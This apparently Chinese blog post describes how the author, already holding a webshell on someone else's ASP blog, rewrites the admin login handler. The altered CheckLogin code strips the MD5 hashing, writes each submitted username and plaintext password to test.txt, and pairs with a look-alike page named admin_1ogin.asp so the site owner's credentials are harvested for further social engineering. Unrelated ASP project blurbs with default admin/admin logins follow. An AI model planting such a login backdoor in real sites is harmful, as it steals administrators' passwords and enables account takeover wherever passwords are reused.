在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。
下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!
省得还要去穷取法破解!
这个密码其实说重要也不重要 说不 重要 其实很重要。
因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。
首先看看他的后台登陆代码
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request("action")
Select Case Action
Case "CheckLogin"
CheckLogin
Case "LoginOut"
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"admin_login.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))("AdName")=""
Response.Cookies(Md5(SN))("AdPwd")=""
session.Abandon()
ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
---意思很简单,这里就不明说了, 主要看md5 ,密码使用md5加密 这样的话,我们记录的密码也就没用了,还是md5。所以
所以想到了,一个钓鱼手法。 它本来的登录界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies((SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"Admin_1ogin.asp"
End if
End Sub
看到没,
a=本来的登录页面 现在换成了钓鱼页面
b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp
为什么呢。
本来的: AdPwd=md5(Trim(request("AdPwd")))
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
修改
AdPwd=(Trim(request("AdPwd")))
Response.Cookies((SN))("AdPwd")=AdPwd
去掉md5。。这样的迷惑手法,使用很久了!。。
没什么技术含量。 还请不要见笑!密码会记录在test.txt上
细心总是好的!
分享到:
相关推荐
ASP论坛留言板是一个基于Active Server Pages (ASP)技术构建的在线交流平台,主要功能包括用户注册、登录、管理员管理和用户管理等。在这个系统中,用户可以注册个人账户,通过登录后发表留言,与其他用户进行互动。...
ASP.NET的Role-Based Authorization允许管理员将用户分配到不同的角色,并根据角色设置访问权限。 3. **数据库交互**:通常,账号信息存储在数据库中,如SQL Server或MySQL。ASP.NET的Entity Framework或ADO.NET...
管理员账号"admin"和密码"admin"是默认的登录凭据,允许管理员访问系统的所有功能,包括添加、编辑和删除员工外出记录,设置权限,查看统计报告等。在实际部署时,为了安全起见,应当修改默认的管理员账号和密码,以...
1. 登录验证:管理员和学生分别通过账号密码登录系统,权限不同,操作范围也各异。 2. 寝室分配:管理员根据规则进行寝室分配,系统自动更新数据库。 3. 信息查询:学生可查询自己的寝室信息,管理员可查看所有...
提到的`config.asp`是配置文件,通常会存储一些系统设置,如数据库连接信息、管理员账号和密码。在实际使用中,管理员需要根据自己的服务器环境和安全需求修改这些信息。 3. **登录与权限控制**: `LOGIN.ASP`是...
6. 默认密码:系统预设的管理员账号为“admin”,密码也是“admin”。出于安全考虑,强烈建议在首次登陆后立即更改默认密码,以防止未经授权的访问。 7. 数据库结构:虽然具体细节未提供,但通常ASP CRM系统会包含...
1. **登录与权限管理**:系统通常会有用户登录界面,员工和管理员需要凭账号密码进入系统。不同角色的用户(如普通员工、部门经理、人力资源等)拥有不同的操作权限,确保数据的安全性和隐私。 2. **员工信息管理**...
3. 管理员账号与权限:系统预设了管理员账号"admin",密码也为"admin"。这表明系统具备基础的用户认证机制,管理员可以登录后进行系统设置、数据管理和权限分配。实际应用中,应确保账号安全,避免使用默认密码,以...
2. **安全性**:除了修改默认管理员账号密码,还应定期更新系统,防止被恶意攻击者利用漏洞。 3. **备份**:在进行任何重大操作之前,最好先备份重要文件,以防意外情况发生。 4. **用户教育**:对使用该系统的...
3.个人信息:管理员和员工可查看和修改自己的个人信息和账号密码 4.银行卡管理:管理员和员工可查看修改自己的银行卡信息,管理员也可查看员工银行卡信息 5、用户操作:管理员可添加用户、查看用户信息、修改用户...
客户关系拓展管理平台 有以下主要功能模块 系统管理 上传我司标志 设置操作权限 ...默认管理员账号密码均为51aspx 内置手机短信发送功能,密码采取Base64位加解密 该项目由Asp.net1.1转换到Asp.net2.0
- 管理员后台:可能有一个管理员界面,用于管理用户信息,审核、编辑或删除发布的信息。 5. 系统优势:由于采用ASP和Access,该系统搭建快速,成本较低,适合初学者学习和实践。同时,系统无连接密码,简化了部署...
后台界面通常由ASP构建,提供直观的图形用户界面供管理员操作。 6. **安全机制**:系统应具备基本的安全措施,如输入验证、防止SQL注入和跨站脚本攻击(XSS)。ASP脚本需要正确处理用户输入,避免恶意数据对系统造成...
在ASP自助图书管理系统中,可能包含了图书信息表(如书名、作者、出版社、ISBN号等)、用户信息表(如用户名、密码、借阅记录等)以及借阅状态表等。通过SQL语句,ASP可以轻松地对这些数据进行增删查改操作。 系统...
《智元软件公文传输管理系统 v4.0.1 Build 070320-ASP源码》是一款基于ASP技术开发的公文流转管理软件,适用于企事业单位内部的文件传递与审批工作。该系统的核心目标是提升办公效率,规范公文处理流程,确保信息的...
这里的默认管理员账号"admin"和其密码,是系统安全性的基础,需要在实际部署时进行修改以增强安全性。 2. 数据库连接:系统可能使用ADO(ActiveX Data Objects)来连接和操作数据库,查询、插入、更新或删除员工...
- 后台管理界面的登录地址为`gl.asp`,预设了管理员账号(用户名:admin,密码:admin)和一个测试用户账号(用户名:test1,密码:test1)。另外,存在二级密码机制(test1),这可能是为了增加安全性,对敏感操作...
在ASP+Access的场景下,数据库中可能有一个用户表,存储着用户的账号和密码信息。 2. **会话管理**:当用户成功验证后,ASP可以创建一个会话(Session),在该会话期间,服务器能够识别并跟踪用户。这可以通过`...
管理员账号"admin"和密码"admin"是系统后台的超级用户,拥有对系统的全面控制权,可以进行系统设置、用户管理、数据维护等操作。教师账号"0001"和学生账号"Z08050131"则分别代表了不同角色的权限,教师可以进行课程...